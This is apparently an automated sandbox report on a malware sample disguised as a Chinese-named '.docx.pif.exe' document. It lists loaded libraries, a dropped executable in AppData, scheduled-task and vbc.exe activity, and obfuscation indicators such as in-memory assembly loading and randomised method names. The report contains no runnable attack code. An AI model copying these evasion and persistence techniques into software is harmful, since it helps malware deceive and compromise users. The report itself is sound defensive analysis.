Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.7570000.8.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.7570000.8.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

15_2_0041CB50

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_02704659 push edx; retf	0_2_0270465A
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_02704699 push edx; retf	0_2_0270469A
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0270469B push edx; retf	0_2_0270469E
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0270469F push edx; retf	0_2_027046A2
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_02704759 push ebp; retf	0_2_0270475A
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0270475B push ebp; retf	0_2_02704762
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_02704791 push esi; retf	0_2_02704792
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0270ABE0 pushfd ; retf	0_2_0270ABE2
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_06AE4A9F push C3037447h; ret	0_2_06AE4AC4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07568049 push 8BBCEB50h; ret	0_2_0756804F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00457106 push ecx; ret	15_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0045B11A push esp; ret	15_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0045E54D push esi; ret	15_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00457A28 push eax; ret	15_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00434E56 push ecx; ret	15_2_00434E69

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Static PE information: section name: .text entropy: 7.988838794549899
Source: TkdxROLUOVpK.exe.0.dr	Static PE information: section name: .text entropy: 7.988838794549899

Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, oxcyjc1LDHjoCrebX9.cs	High entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, mtvXm3uIEAO1aOMiyD.cs	High entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, wOvN8bjY05qG3h2W8d.cs	High entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	High entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, PenYE0tkOYCLDqwRMy.cs	High entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, DWbfV733wDM7SoPHEF6.cs	High entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, qKcUIQWYkr2kHlVcDF.cs	High entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, v0UVJv4Fuk8ZSL2f7F.cs	High entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, ALpl925dRu9MqQXKDu.cs	High entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, fJAQuF3YIVEeN8MhNPj.cs	High entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, icvX8XzjLawXkxgs9u.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, EyMqHCPs9E9FenpsLm.cs	High entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, sXXw773dDD510lc6jEC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, DqQ9hFBLg85nfpHLYg.cs	High entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, xOjHSwE9BsL66jh6xb.cs	High entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, spQoUaHnJ5qLMKORun.cs	High entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, SiNRcVkQKnvrVZtVoQ.cs	High entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, xo5PZY2ot5o5nvQbi0.cs	High entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, RdIWAaqWmQBYJZJocJ.cs	High entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, fspkOWvogMOU36TAoN.cs	High entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, s1uhC0LTpfAvYaiZjt.cs	High entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, SgBrdEKGapRfKEKkNh.cs	High entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, OpOgmCw6PPUf8olH7e.cs	High entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, oxcyjc1LDHjoCrebX9.cs	High entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, mtvXm3uIEAO1aOMiyD.cs	High entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, wOvN8bjY05qG3h2W8d.cs	High entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	High entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, PenYE0tkOYCLDqwRMy.cs	High entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
